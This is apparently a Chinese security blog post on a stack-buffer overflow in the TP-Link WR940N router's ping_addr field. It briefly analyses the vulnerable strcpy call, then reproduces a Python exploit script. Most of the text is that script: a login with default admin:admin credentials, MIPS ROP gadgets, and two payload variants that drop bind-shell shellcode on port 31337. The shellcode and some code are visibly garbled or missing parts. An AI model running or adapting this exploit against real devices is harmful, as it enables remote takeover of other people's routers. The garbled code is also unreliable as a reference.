本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274
之前使用 firmadyn
可以正常模拟运行,但是调试不了,就没有仔细看这个漏洞。今天突然想起 他会启动一个 ssh
漏洞位与 管理员用来 ping
地址时没有验证长度,然后复制到栈上,造成栈溢出。搜索关键字符串 ping_addr
定位到函数 sub_453C50
获取 ip
地址后,把字符串指针放到 $s6
先调用了 memset
初始化缓冲区,然后调用 strcpy
把 ip
利用的话和前文是一样的,经典的栈溢出,经典的 rop。
附上参考链接里的 exp
# -*- coding: UTF-8 -*-
import urllib2
import base64
import hashlib
from optparse import *
import sys
import urllib
banner = (
"WR940N Authenticated Remote Code Exploit
"This exploit will open a bind shell on the remote target
"The port is 31337, you can change that in the code if you wish
"This exploit requires authentication, if you know the creds, then
"use the -u -p options, otherwise default is admin:admin
def login(ip, user, pwd):
print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)
#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))
hash = hashlib.md5()
auth_string = "%s:%s" %(user, hash.hexdigest())
encoded_string = base64.b64encode(auth_string)
print "[+] Encoded authorisation: %s" %encoded_string#### Send the request
url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"
print "[+] sending login to " + url
req = urllib2.Request(url)
req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)
resp = urllib2.urlopen(req)
#### The server generates a random path for further requests, grab that here
data = resp.read()
next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])
print "[+] Got random path for next stage, url is now %s" %next_url
return (next_url, encoded_string)
#custom bind shell shellcode with very simple xor encoder
#followed by a sleep syscall to flush cash before running
#bad chars = 0x20, 0x00
shellcode = (
"x27xb2x05x4b" #0x27b2059f for first_exploit
################ encoded shellcode ###############
"x7ax69" #<————————- PORT 0x7a69 (31337)
###### useful gadgets #######
nop = "x22x51x44x44"
gadg_1 = "x2AxB3x7Cx60" # set $a0 = 1, and jmp $s1
gadg_2 = "x2AxB1x78x40"
sleep_addr = "x2axb3x50x90"
stack_gadg = "x2AxAFx84xC0"
call_code = "x2AxB2xDCxF0"
def first_exploit(url, auth):
# trash $s1 $ra
rop = "A"*164 + gadg_2 + gadg_1 + "B"*0x20 + sleep_addr + "C"*4
rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode
params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}
new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)
print "[+] sending exploit…"
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "DiagnosticRpm.htm")
resp = urllib2.urlopen(req)
def second_exploit(url, auth):
url = url + "WanStaticIpV6CfgRpm.htm?"
# trash s0 s1 s2 s3 s4 ret shellcode
payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c
payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4
payload += stack_gadg + "A"*4 + nop*10 + shellcode + "B"*7
print len(payload)
params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',
'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',
'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',
'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}
new_url = url + urllib.urlencode(params)
print "[+] sending exploit…"
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")
resp = urllib2.urlopen(req)
if __name__ == '__main__':
print banner
username = "admin"
password = "admin"
(next_url, encoded_string) = login("", username, password)
###### Both exploits result in the same bind shell ######
#first_exploit(data[0], data[1])
first_exploit(next_url, encoded_string)